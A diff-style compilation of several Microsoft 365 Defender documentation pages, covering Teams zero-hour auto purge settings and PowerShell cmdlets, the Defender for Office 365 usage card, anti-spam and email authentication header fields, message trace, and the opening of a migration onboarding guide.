-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Settings** \> **Email & collaboration** \> **Microsoft Teams protection**. Or, to go directly to the **Microsoft Teams protection** page, use <https://security.microsoft.com/securitysettings/teamsProtectionPolicy>.
-
-2. On the **Microsoft Teams protection** page, verify the toggle in the **Zero-hour auto purge (ZAP)** section:
- - **Turn on ZAP for Teams**: Verify the toggle is **On** :::image type="icon" source="../../media/scc-toggle-on.png" border="false":::.
- - **Turn off ZAP for Teams**: Slide the toggle to **Off** :::image type="icon" source="../../media/scc-toggle-off.png" border="false":::.
-
-3. When the toggle is **On** :::image type="icon" source="../../media/scc-toggle-on.png" border="false":::, use the remaining settings on the page to customize ZAP for Teams protection:
-
- - **Quarantine policies** section: You can select the existing quarantine policy to use for messages that are quarantined by ZAP for Teams protection as **Malware** or **High confidence phishing**. Quarantine policies define what users are able to do to quarantined messages, and whether users receive quarantine notifications. For more information, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).
-
- > [!NOTE]
- > Quarantine notifications are disabled in the policy named AdminOnlyAccessPolicy. To notify recipients that have messages quarantined as malware or high confidence phishing, create or use an existing quarantine policy where quarantine notifications are turned on. For instructions, see [Create quarantine policies in the Microsoft Defender portal](quarantine-policies.md#step-1-create-quarantine-policies-in-the-microsoft-defender-portal).
-
- - **Exclude these participants** section: Specify the **Users**, **Groups**, or **Domains** to exclude from ZAP for Teams protection. Exclusions matter for message _recipients_, not message _senders_. For more information, see [Zero-hour auto purge (ZAP) in Microsoft Teams](zero-hour-auto-purge.md#zero-hour-auto-purge-zap-in-microsoft-teams).
-
- You can use an exception only once, but the exception can contain multiple values:
-
- - Multiple **values** of the **same exception** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_). If the recipient matches **any** of the specified values, ZAP for Teams protection isn't applied to them.
- - Different **types of exceptions** use OR logic (for example, _\<recipient1\>_ or _\<member of group1\>_ or _\<member of domain1\>_). If the recipient matches **any** of the specified exception values, ZAP for Teams protection isn't applied to them.
-
-4. When you're finished on the **Microsoft Teams protection** page, select **Save**.
--
-### Use Exchange Online PowerShell to configure ZAP for Teams protection
-
-If you'd rather use [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell) to configure ZAP for Microsoft Teams, the following cmdlets are involved:
--- The Teams protection policy (**\*-TeamsProtectionPolicy** cmdlets) turns ZAP for Teams on and off and specifies the quarantine policies to use for malware and high confidence phishing detections.-- The Teams protection policy rule (**\*-TeamsProtectionPolicyRule** cmdlets) identifies the Teams protection policy and specifies any exceptions for ZAP for Teams protection (users, groups, or domains).-
-**Notes**:
--- There's only one Teams protection policy in an organization. By default, that policy is named Teams Protection Policy.-- Using the **New-TeamsProtectionPolicy** cmdlet is meaningful only if there's no Teams protection policy in the organization (the **Get-TeamsProtectionPolicy** cmdlet returns nothing). You can run the cmdlet without error, but no new Teams protection policies are created if one already exists.-- You can't remove an existing Teams protection policy or Teams protection policy rule (there's no **Remove-TeamsProtectionPolicy** or **Remove-TeamsProtectionPolicyRule** cmdlet).-- By default, there's no Teams protection policy rule (the **Get-TeamsProtectionPolicyRule** cmdlet returns nothing). Specifying quarantine policies or exceptions for ZAP for Teams in the Defender portal creates the rule automatically. Or, you can use the **New-TeamsProtectionPolicyRule** cmdlet to create the rule in PowerShell if it doesn't already exist.-
-#### Use PowerShell to view the Teams protection policy and Teams protection policy rule
-
-To view the important values in Teams protection policy and Teams protection policy rule, run the following commands:
-
-```powershell
-Get-TeamsProtectionPolicy | Format-List Name,ZapEnabled,HighConfidencePhishQuarantineTag,MalwareQuarantineTag
-
-Get-TeamsProtectionPolicyRule | Format-List Name,TeamsProtectionPolicy,ExceptIfSentTo,ExceptIfSentToMemberOf,ExceptIfRecipientDomainIs
-```
-
-For detailed syntax and parameter information, see [Get-TeamsProtectionPolicy](/powershell/module/exchange/get-teamsprotectionpolicy) and [Get-TeamsProtectionPolicyRule](/powershell/module/exchange/get-teamsprotectionpolicyrule).
-
-#### Use PowerShell to modify the Teams protection policy
-
-To modify the Teams protection policy, use the following syntax:
-
-```powershell
-Set-TeamsProtectionPolicy -Identity "Teams Protection Policy" [-ZapEnabled <$true | $false>] [-HighConfidencePhishQuarantineTag "<QuarantinePolicyName>"] [-MalwareQuarantineTag "<QuarantinePolicyName>"]
-```
-
-This example enables ZAP for Teams and changes the quarantine policy that's used for high confidence phishing detections:
-
-```powershell
-Set-TeamsProtectionPolicy -Identity "Teams Protection Policy" -ZapEnabled $true -HighConfidencePhishQuarantineTag AdminOnlyWithNotifications
-```
-
-For detailed syntax and parameter information, see [Set-TeamsProtectionPolicy](/powershell/module/exchange/set-teamsprotectionpolicy).
-
-#### Use PowerShell to create the Teams protection policy rule
-
-By default, there's no Teams protection policy rule, because there are no default exceptions for ZAP for Teams.
-
-To create a new Teams protection policy rule, use the following syntax:
-
-```powershell
-New-TeamsProtectionPolicyRule -Name "Teams Protection Policy Rule" -TeamsProtectionPolicy "Teams Protection Policy" [-ExceptIfSentTo <UserEmail1,UserEmail2,...UserEmailN>] [-ExceptIfSentToMemberOf <GroupEmail1,GroupEmail2,...GroupEmailN>] [-ExceptIfRecipientDomainIs <Domain1,Domain2,...DomainN>]
-```
-
-> [!IMPORTANT]
-> As explained previously in this article, multiple exception types (users, groups, and domains) use OR logic, not AND.
-
-This example creates the Teams protection policy rule with members of the group named Research excluded from ZAP for Teams protection.
-
-```powershell
-New-TeamsProtectionPolicyRule -Name "Teams Protection Policy Rule" -TeamsProtectionPolicy "Teams Protection Policy" -ExceptIfSentToMemberOf research@contoso.onmicrosoft.com
-```
-
-For detailed syntax and parameter information, see [New-TeamsProtectionPolicyRule](/powershell/module/exchange/new-teamsprotectionpolicyrule).
-
-#### Use PowerShell to modify the Teams protection policy rule
-
-If the Teams protection policy rule already exists (the **Get-TeamsProtectionPolicyRule** cmdlet returns output), use the following syntax to modify the rule:
-
-```powershell
-Set-TeamsProtectionPolicyRule -Identity "Teams Protection Policy Rule" [-ExceptIfSentTo <UserEmailAddresses | $null>] [-ExceptIfSentToMemberOf <GroupEmailAddresses | $null>] [-ExceptIfRecipientDomainIs <Domains | $null>]
-```
-
-**Notes**:
--- For information about the syntax for adding, removing, and replacing all values for the _ExceptIfSentTo_, _ExceptIfSentToMemberOf_, and _ExceptIfRecipientDomainIs_ parameters, see the parameter descriptions in [Set-TeamsProtectionPolicyRule](/powershell/module/exchange/set-teamsprotectionpolicyrule).-- To empty the _ExceptIfSentTo_, _ExceptIfSentToMemberOf_, or _ExceptIfRecipientDomainIs_ parameters, use the value `$null`.-
-This example modifies the existing Teams protection policy rule by excluding recipients in the domains research.contoso.com and research.contoso.net from ZAP for Teams protection.
-
-```powershell
-Set-TeamsProtectionPolicyRule -Identity "Teams Protection Policy Rule" -ExceptIfRecipientDomainIs research.contoso.com,research.contoso.net
-```
-
-For detailed syntax and parameter information, see [Set-TeamsProtectionPolicyRule](/powershell/module/exchange/set-teamsprotectionpolicyrule).
-
-## See also
--- [Microsoft Teams](/microsoftteams/teams-overview)-- [Managing Teams quarantined messages](quarantine-admin-manage-messages-files.md#use-the-microsoft-defender-portal-to-manage-microsoft-teams-quarantined-messages)-- [Get started using Attack simulation training in Defender for Office 365](attack-simulation-training-get-started.md)
security Mdo Usage Card About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/mdo-usage-card-about.md
- Title: Usage card in Microsoft Defender for Office 365
-keywords: AIR, autoIR, Microsoft Defender for Endpoint, automated, investigation, response, remediation, threats, advanced, threat, protection
-- NOCSH------ MET150-- MOE150--- m365-security-- tier2-
-description: Learn about your organization's active usage of Microsoft Defender for Office 365 licenses versus the actual number of licenses purchased.
- Previously updated : 1/17/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Usage card in Microsoft Defender for Office 365
--
-In organizations with Microsoft Defender for Office 365, the usage card is available to help admins and Security Operations (SecOps) teams understand the usage of Defender for Office 365. Specifically, they can compare the active usage of Defender for Office 365 licenses vs the actual number of available licenses.
-
-> [!TIP]
-> The usage card is enabled for tenants with at least one paid Defender for Office 365 Plan 1 or Defender for Office 365 Plan 2 license.
-
-Usage cards can help determine the following scenarios:
--- The active usage of Exchange Online licenses and how many of those licenses are active usage of Microsoft Defender for Office 365.-- A Breakdown of active usage across key Plan 1 and Plan 2 capabilities (Plan 1: protection and detection; Plan 2: SecOps capabilities).-- The Number of active Plan 1 and Plan 2 licenses purchased.-
-## View the usage card
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Reports** \> **Email & collaboration** section \> **Email & collaboration reports**. Or, to go directly to the **Email & collaboration reports and insights** page, use <https://security.microsoft.com/emailandcollabreport>.
-
-2. On the **Email & collaboration reports and insights** page, go to the **Email & collaboration insights** section, and find the **Defender for Office 365 usage** card.
-
- :::image type="content" source="../../medio.png":::
-
-For members of **Global Administrator** or **Billing Administrator** roles in [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal), following items are available on the card:
--- **Add more licenses**-- **See licensing details**-
-These items aren't available for member of **Global Reader**, **Security Administrator**, **Security Operator**, or **Security Reader** roles.
-
-## Understand usage details
-
-On the **Defender for Office 365 usage** card, select **Show details**.
--
-The details flyout that opens contains the following information from the last 28 days:
--- The number of active users in the organization and the number of Plan 2 licenses.-- **Configured prevention and detection** section:
- - **Users with Office protection**: The number of active users of Safe Links or Safe Attachments for Office 365.
- - **Users with email protection**: The number of active users of Safe Links or Safe Attachments for emails.
- - **Users with Teams protection**: The number of active users of Safe Links for Teams.
-- **Security Operations capabilities** section: The number of active users for the following categories:
- - **Users for whom manual and automated investigations were triggered**.
- - **Users for whom remediations were triggered**.
- - **Users targeted by phishing simulation training**.
-
-**Threat protection status report** takes you to the [Threat protection status report](reports-email-security.md#threat-protection-status-report).
-
-**See licensing details** is available for members of the **Global Administrators** or **Security Operator** roles in [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal).
-
-## Frequently asked questions
-
-### What are the different types of active users?
-
-There are three types of active users:
--- **Defender for Office 365 active users**: The distinct user count with active usage of Microsoft Defender for Office 365 Plan 1 and/or Plan 2 licenses over a period of 28 days for a specific paid Microsoft Defender for Office 365 tenant.-- **Active users**: The distinct user count with active usage of licenses over the past 28 days for a specific paid Microsoft Defender for Office 365 tenant.-- **Other active users**: Active users without the Microsoft Defender for Office 365 active users.-
-### What is the usage count?
-
-Usage count can be determined by:
--- **Users with Office 365 protection**: Distinct count of active users of Safe Links for Office 365 or Safe Attachments for Office 365.-- **Users with email protection**: Distinct count of active users of Safe Links for email or Safe Attachments for email.-- **Users for whom manual and automated investigations were triggered**: Manual investigations triggered from Threat Explorer or auto investigations actions approved or rejected by SecOps in Incidents or in Action center.-- **Users for whom remediations were triggered**: Manual remediations in Threat Explorer, Email entity, Advanced Hunting, Automation, or Action center.-- **Users targeted by Attack simulation training**: Users who were targeted as part of simulations over past 28 days.-
-### I have Defender for Office 365 Plan 1 or Plan 2 paid license. Why can I not see the usage card?
-
-If you have at least one Defender for Office 365 Plan 1 or Plan 2 license, but you're still unable to see the card because of one of the following reasons:
--- You don't have the required role to be able to view the card.-- Your organization had no active usage in the past 28 days.-
-### What does Collecting license and usage data status mean?
-
-If you see **Collecting license and usage data** status in your usage card, it means Microsoft is still collecting your current licensing and usage data. When it's available, you can see the full usage card and other details.
--
-### Why does the Usage card show an overage even though you don't have Defender for Office 365 Plan 2 and no usage of SecOps capabilities?
-
-The usage card shows usage of both Defender for Office 365 Plan 1 and Plan 2. If you don't have any Plan 2 licenses, the usage is coming from Plan 1 features (for example, Safe Links or Safe Attachments). You can fix this overage by purchasing more Plan 1 licenses.
security Message Headers Eop Mdo https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/message-headers-eop-mdo.md
- Title: Anti-spam message headers
- - NOCSH
-----
- - MET150
-
- - m365-security
- - tier2
-description: Admins can learn about the header fields that are added to messages by Exchange Online Protection (EOP). These header fields provide information about the message and how it was processed.
-- Previously updated : 9/8/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Anti-spam message headers in Microsoft 365
--
-In all Microsoft 365 organizations, Exchange Online Protection (EOP) scans all incoming messages for spam, malware, and other threats. The results of these scans are added to the following header fields in messages:
--- **X-Forefront-Antispam-Report**: Contains information about the message and about how it was processed.-- **X-Microsoft-Antispam**: Contains additional information about bulk mail and phishing.-- **Authentication-results**: Contains information about SPF, DKIM, and DMARC (email authentication) results.-
-This article describes what's available in these header fields.
-
-For information about how to view an email message header in various email clients, see [View internet message headers in Outlook](https://support.microsoft.com/office/cd039382-dc6e-4264-ac74-c048563d212c).
-
-> [!TIP]
-> You can copy and paste the contents of a message header into the [Message Header Analyzer](https://mha.azurewebsites.net/) tool. This tool helps parse headers and put them into a more readable format.
-
-## X-Forefront-Antispam-Report message header fields
-
-After you have the message header information, find the **X-Forefront-Antispam-Report** header. There are multiple field and value pairs in this header separated by semicolons (;). For example:
-
-`...CTRY:;LANG:hr;SCL:1;SRV:;IPV:NLI;SFV:NSPM;PTR:;SFTY:;...`
-
-The individual fields and values are described in the following table.
-
-> [!NOTE]
-> The **X-Forefront-Antispam-Report** header contains many different fields and values. Fields that aren't described in the table are used exclusively by the Microsoft anti-spam team for diagnostic purposes.
-
-|Field|Description|
-|||
-|`ARC`|The `ARC` protocol has the following fields: <ul><li>`AAR`: Records the content of the **Authentication-results** header from DMARC.</li><li>`AMS`: Includes cryptographic signatures of the message.</li><li>`AS`: Includes cryptographic signatures of the message headers. This field contains a tag of a chain validation called `"cv="`, which includes the outcome of the chain validation as **none**, **pass**, or **fail**.</li></ul>|
-|`CAT:`|The category of protection policy that's applied to the message: <ul><li>`AMP`: Anti-malware</li><li>`BULK`: Bulk</li><li>`DIMP`: Domain impersonation<sup>\*</sup></li><li>`FTBP`: Anti-malware [common attachments filter](anti-malware-protection-about.md#common-attachments-filter-in-anti-malware-policies)</li><li>`GIMP`: [Mailbox intelligence](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365) impersonation<sup>\*</sup></li><li>`HPHSH` or `HPHISH`: High confidence phishing</li><li>`HSPM`: High confidence spam</li><li>`INTOS`: Intra-Organization phishing</li><li>`MALW`: Malware</li><li>`OSPM`: Outbound spam</li><li>`PHSH`: Phishing</li><li>`SAP`: Safe Attachments<sup>\*</sup></li><li>`SPM`: Spam</li><li>`SPOOF`: Spoofing</li><li>`UIMP`: User impersonation<sup>\*</sup></li></ul> <br/> <sup>\*</sup>Defender for Office 365 only. <br/><br/> An inbound message might be flagged by multiple forms of protection and multiple detection scans. Policies are applied in an order of precedence, and the policy with the highest priority is applied first. For more information, see [What policy applies when multiple protection methods and detection scans run on your email](how-policies-and-protections-are-combined.md).|
-|`CIP:[IP address]`|The connecting IP address. You can use this IP address in the IP Allow List or the IP Block List. For more information, see [Configure connection filtering](connection-filter-policies-configure.md).|
-|`CTRY`|The source country/region as determined by the connecting IP address, which might not be the same as the originating sending IP address.|
-|`DIR`|The Directionality of the message: <ul><li>`INB`: Inbound message.</li><li>`OUT`: Outbound message.</li><li>`INT`: Internal message.</li></ul>|
-|`H:[helostring]`|The HELO or EHLO string of the connecting email server.|
-|`IPV:CAL`|The message skipped spam filtering because the source IP address was in the IP Allow List. For more information, see [Configure connection filtering](connection-filter-policies-configure.md).|
-|`IPV:NLI`|The IP address wasn't found on any IP reputation list.|
-|`LANG`|The language that the message was written in as specified by the country code (for example, ru_RU for Russian).|
-|`PTR:[ReverseDNS]`|The PTR record (also known as the reverse DNS lookup) of the source IP address.|
-|`SCL`|The spam confidence level (SCL) of the message. A higher value indicates the message is more likely to be spam. For more information, see [Spam confidence level (SCL)](anti-spam-spam-confidence-level-scl-about.md).|
-|`SFTY`|The message was identified as phishing and is also marked with one of the following values: <ul><li>9.19: Domain impersonation. The sending domain is attempting to [impersonate a protected domain](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365). The safety tip for domain impersonation is added to the message (if it's enabled).</li><li>9.20: User impersonation. The sending user is attempting to impersonate a user in the recipient's organization, or [a protected user that's specified in an anti-phishing policy](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365) in Microsoft Defender for Office 365. The safety tip for user impersonation is added to the message (if it's enabled).</li><li>9.25: First contact safety tip. This value _might_ be an indication of a suspicious or phishing message. For more information, see [First contact safety tip](anti-phishing-policies-about.md#first-contact-safety-tip).</li></ul>|
-|`SFV:BLK`|Filtering was skipped and the message was blocked because it was sent from an address in a user's Blocked Senders list. <p> For more information about how admins can manage a user's Blocked Senders list, see [Configure junk email settings on Exchange Online mailboxes](configure-junk-email-settings-on-exo-mailboxes.md).|
-|`SFV:NSPM`|Spam filtering marked the message as nonspam and the message was sent to the intended recipients.|
-|`SFV:SFE`|Filtering was skipped and the message was allowed because it was sent from an address in a user's Safe Senders list. <p> For more information about how admins can manage a user's Safe Senders list, see [Configure junk email settings on Exchange Online mailboxes](configure-junk-email-settings-on-exo-mailboxes.md).|
-|`SFV:SKA`|The message skipped spam filtering and was delivered to the Inbox because the sender was in the allowed senders list or allowed domains list in an anti-spam policy. For more information, see [Configure anti-spam policies](anti-spam-policies-configure.md).|
-|`SFV:SKB`|The message was marked as spam because it matched a sender in the blocked senders list or blocked domains list in an anti-spam policy. For more information, see [Configure anti-spam policies](anti-spam-policies-configure.md).|
-|`SFV:SKN`|The message was marked as nonspam before processing by spam filtering. For example, the message was marked as SCL -1 or **Bypass spam filtering** by a mail flow rule.|
-|`SFV:SKQ`|The message was released from the quarantine and was sent to the intended recipients.|
-|`SFV:SKS`|The message was marked as spam before processing by spam filtering. For example, the message was marked as SCL 5 to 9 by a mail flow rule.|
-|`SFV:SPM`|The message was marked as spam by spam filtering.|
-|`SRV:BULK`|The message was identified as bulk email by spam filtering and the bulk complaint level (BCL) threshold. When the _MarkAsSpamBulkMail_ parameter is `On` (it's on by default), a bulk email message is marked as spam (SCL 6). For more information, see [Configure anti-spam policies](anti-spam-policies-configure.md).|
-|`X-CustomSpam: [ASFOption]`|The message matched an Advanced Spam Filter (ASF) setting. To see the X-header value for each ASF setting, see [Advanced Spam Filter (ASF) settings](anti-spam-policies-asf-settings-about.md). <br><br> **Note**: ASF adds `X-CustomSpam:` X-header fields to messages _after_ the messages were processed by Exchange mail flow rules (also known as transport rules), so you can't use mail flow rules to identify and act on messages that were filtered by ASF.|
-
-## X-Microsoft-Antispam message header fields
-
-The following table describes useful fields in the **X-Microsoft-Antispam** message header. Other fields in this header are used exclusively by the Microsoft anti-spam team for diagnostic purposes.
-
-|Field|Description|
-|||
-|`BCL`|The bulk complaint level (BCL) of the message. A higher BCL indicates a bulk mail message is more likely to generate complaints (and is therefore more likely to be spam). For more information, see [Bulk complaint level (BCL) in EOP](anti-spam-bulk-complaint-level-bcl-about.md).|
-
-## Authentication-results message header
-
-The results of email authentication checks for SPF, DKIM, and DMARC are recorded (stamped) in the **Authentication-results** message header in inbound messages. The **Authentication-results** header is defined in [RFC 7001](https://datatracker.ietf.org/doc/html/rfc7001).
-
-The following list describes the text that's added to the **Authentication-Results** header for each type of email authentication check:
--- SPF uses the following syntax:-
- ```text
- spf=<pass (IP address)|fail (IP address)|softfail (reason)|neutral|none|temperror|permerror> smtp.mailfrom=<domain>
- ```
-
- For example:
-
- ```text
- spf=pass (sender IP is 192.168.0.1) smtp.mailfrom=contoso.com
-
- spf=fail (sender IP is 127.0.0.1) smtp.mailfrom=contoso.com
- ```
--- DKIM uses the following syntax:-
- ```text
- dkim=<pass|fail (reason)|none> header.d=<domain>
- ```
-
- For example:
-
- ```text
- dkim=pass (signature was verified) header.d=contoso.com
-
- dkim=fail (body hash did not verify) header.d=contoso.com
- ```
--- DMARC uses the following syntax:-
- ```text
- dmarc=<pass|fail|bestguesspass|none> action=<permerror|temperror|oreject|pct.quarantine|pct.reject> header.from=<domain>
- ```
-
- For example:
-
- ```text
- dmarc=pass action=none header.from=contoso.com
-
- dmarc=bestguesspass action=none header.from=contoso.com
-
- dmarc=fail action=none header.from=contoso.com
-
- dmarc=fail action=oreject header.from=contoso.com
- ```
-
-### Authentication-results message header fields
-
-The following table describes the fields and possible values for each email authentication check.
-
-|Field|Description|
-|||
-|`action`|Indicates the action taken by the spam filter based on the results of the DMARC check. For example: <ul><li>`pct.quarantine`: Indicates that a percentage less than 100% of messages that don't pass DMARC are delivered anyway. This result means that the message failed DMARC and the DMARC policy was set to `p=quarantine`. But, the pct field wasn't set to 100%, and the system randomly determined not to apply the DMARC action per the specified domain's DMARC policy.</li><li>`pct.reject`: Indicates that a percentage less than 100% of messages that don't pass DMARC are delivered anyway. This result means that the message failed DMARC and the DMARC policy was set to `p=reject`. But, the pct field wasn't set to 100% and the system randomly determined not to apply the DMARC action per the specified domain's DMARC policy.</li><li>`permerror`: A permanent error occurred during DMARC evaluation, such as encountering an incorrectly formed DMARC TXT record in DNS. Attempting to resend this message isn't likely to end with a different result. Instead, you might need to contact the domain's owner in order to resolve the issue.</li><li>`temperror`: A temporary error occurred during DMARC evaluation. You might be able to request that the sender resend the message later in order to process the email properly.</li></ul>|
-|`compauth`|Composite authentication result. Used by Microsoft 365 to combine multiple types of authentication (SPF, DKIM, and DMARC), or any other part of the message to determine whether or not the message is authenticated. Uses the From: domain as the basis of evaluation. **Note**: Despite a `compauth` failure, the message might still be allowed if other assessments don't indicate a suspicious nature.|
-|`dkim`|Describes the results of the DKIM check for the message. Possible values include: <ul><li>**pass**: Indicates the DKIM check for the message passed.</li><li>**fail (reason)**: Indicates the DKIM check for the message failed and why. For example, if the message wasn't signed or the signature wasn't verified.</li><li>**none**: Indicates that the message wasn't signed. This result might or might not indicate that the domain has a DKIM record or the DKIM record doesn't evaluate to a result.</li></ul>|
-|`dmarc`|Describes the results of the DMARC check for the message. Possible values include: <ul><li>**pass**: Indicates the DMARC check for the message passed.</li><li>**fail**: Indicates the DMARC check for the message failed.</li><li>**bestguesspass**: Indicates that no DMARC TXT record exists for the domain exists. If the domain had a DMARC TXT record, the DMARC check for the message would have passed.</li><li>**none**: Indicates that no DMARC TXT record exists for the sending domain in DNS.|
-|`header.d`|Domain identified in the DKIM signature if any. This is the domain that's queried for the public key.|
-|`header.from`|The domain of the `5322.From` address in the email message header (also known as the From address or P2 sender). Recipient sees the From address in email clients.|
-|`reason`|The reason the composite authentication passed or failed. The value is a three-digit code. For example: <ul><li>**000**: The message failed explicit authentication (`compauth=fail`). For example, the message received a DMARC fail and the DMARC policy action is `p=quarantine` or `p=reject`.</li><li>**001**: The message failed implicit authentication (`compauth=fail`). This result means that the sending domain didn't have email authentication records published, or if they did, they had a weaker failure policy (SPF `~all` or `?all`, or a DMARC policy of `p=none`).</li><li>**002**: The organization has a policy for the sender/domain pair that is explicitly prohibited from sending spoofed email. An admin manually configures this setting.</li><li>**010**: The message failed DMARC, the DMARC policy action is `p=reject` or `p=quarantine`, and the sending domain is one of your organization's accepted domains (self-to-self or intra-org spoofing).</li><li>**1xx** or **7xx**: The message passed authentication (`compauth=pass`). The last two digits are internal codes used by Microsoft 365.</li><li>**2xx**: The message soft-passed implicit authentication (`compauth=softpass`). The last two digits are internal codes used by Microsoft 365.</li><li>**3xx**: The message wasn't checked for composite authentication (`compauth=none`).</li><li>**4xx** or **9xx**: The message bypassed composite authentication (`compauth=none`). The last two digits are internal codes used by Microsoft 365.</li><li>**6xx**: The message failed implicit email authentication, and the sending domain is one of your organization's accepted domains (self-to-self or intra-org spoofing).</li></ul>|
-|`smtp.mailfrom`|The domain of the `5321.MailFrom` address (also known as the MAIL FROM address, P1 sender, or envelope sender). This email address is used for non-delivery reports (also known as NDRs or bounce messages).|
-|`spf`|Describes the results of the SPF check for the message. Possible values include: <ul><li>`pass (IP address)`: The SPF check for the message passed and includes the sender's IP address. The client is authorized to send or relay email on behalf of the sender's domain.</li><li>`fail (IP address)`: The SPF check for the message failed and includes the sender's IP address. This result is sometimes called _hard fail_.</li><li>`softfail (reason)`: The SPF record designated the host as not being allowed to send, but is in transition.</li><li>`neutral`: The SPF record explicitly states that it doesn't assert whether the IP address is authorized to send.</li><li>`none`: The domain doesn't have an SPF record or the SPF record doesn't evaluate to a result.</li><li>`temperror`: A temporary error has occurred. For example, a DNS error. The same check later might succeed.</li><li>`permerror`: A permanent error has occurred. For example, the domain has a badly formatted SPF record.</li></ul>|
security Message Trace Defender Portal https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/message-trace-defender-portal.md
- Title: Message trace in the Microsoft Defender portal
- - NOCSH
-----
- - m365-security
- - tier2
-
- - seo-marvel-apr2020
-description: Admins can use the Message trace link in the Microsoft Defender portal to find out what happened to messages.
- Previously updated : 10/9/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Message trace in the Microsoft Defender portal
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, message trace follows email messages as they travel through your Microsoft 365 organization. You can determine if a message was received, rejected, deferred, or delivered by the service. It also shows what actions were taken on the message before it reached its final status.
-
-You can use the information from message trace to efficiently answer user questions about what happened to messages, troubleshoot mail flow issues, and validate policy changes.
-
-The **Summary report** in the message trace contains the information that helps you answer user questions and troubleshoot mail flow issues. This **Summary report** enables you to view the report in a file that can be opened in Windows Explorer (also known as File Explorer).
-
-You can use the **View in Explorer** option in the **Message trace search results** page in [Exchange admin center](https://admin.exchange.microsoft.com/). However, to use this option, you must fulfill the following prerequisite:
--- You must procure the E5/A5 license to access a feature within the Office 365 Threat Intelligence licensing. This feature only enables you to use the **View in Explorer** option.-
-> [!TIP]
-> The **Message trace** page in the Microsoft Defender portal is a really pass through to **Message trace** page in the new Exchange admin center (EAC) at <https://admin.exchange.microsoft.com/#/messagetrace>.
-
-## What do you need to know before you begin?
--- The maximum number of messages that are displayed in the results of a message trace depends on the report type you selected (see the [Choose report type](/exchange/monitoring/trace-an-email-message/message-trace-modern-eac#choose-report-type) section for details). The [Get-HistoricalSearch](/powershell/module/exchange/get-historicalsearch) cmdlet in Exchange Online PowerShell or standalone EOP PowerShell returns all messages in the results.--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Exchange Online permissions](/exchange/permissions-exo/permissions-exo): Membership in the **Organization Management**, **Compliance Management** or **Help Desk** role groups.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator** or **Compliance Administrator** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
-
-## Open message trace
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Exchange message trace**.
-
-At this point, the **Message trace** page in the new EAC opens. To go directly to this page, use <https://admin.exchange.microsoft.com/#/messagetrace>. For more information, see [Message trace in the new Exchange admin center](/exchange/monitoring/trace-an-email-message/message-trace-modern-eac).
security Migrate To Defender For Office 365 Onboard https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/migrate-to-defender-for-office-365-onboard.md
- Title: "Migrate to Microsoft Defender for Office 365 Phase 3: Onboard"
- - NOCSH
----
- - MET150
- - MOE150
-
- - m365-security
- - m365solution-mdo-migration
- - highpri
- - tier1
-
-description: "Complete the steps for migrating from a third-party protection service or device to Microsoft Defender for Office 365 protection."
- Previously updated : 6/15/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Migrate to Microsoft Defender for Office 365 - Phase 3: Onboard
-
-<br/>
-
-|[:::image type="content" source="../../medi)|:::image type="content" source="../../media/phase-diagrams/onboard.png" alt-text="Phase 3: Onboard." lightbox="../../media/phase-diagrams/onboard.png"::: <br/> Phase 3: Onboard|
-||||
-|||*You are here!*|
-
-Welcome to **Phase 3: Onboard** of your **[migration to Microsoft Defender for Office 365](migrate-to-defender-for-office-365.md#the-migration-process)**! This migration phase includes the following steps:
-
-1. [Begin onboarding Security Teams](#step-1-begin-onboarding-security-teams)
-2. [(Optional) Exempt pilot users from filtering by your existing protection service](#step-2-optional-exempt-pilot-users-from-filtering-by-your-existing-protection-service)
-3. [Tune spoof intelligence](#step-3-tune-spoof-intelligence)
-4. [Tune impersonation protection and mailbox intelligence](#step-4-tune-impersonation-protection-and-mailbox-intelligence)
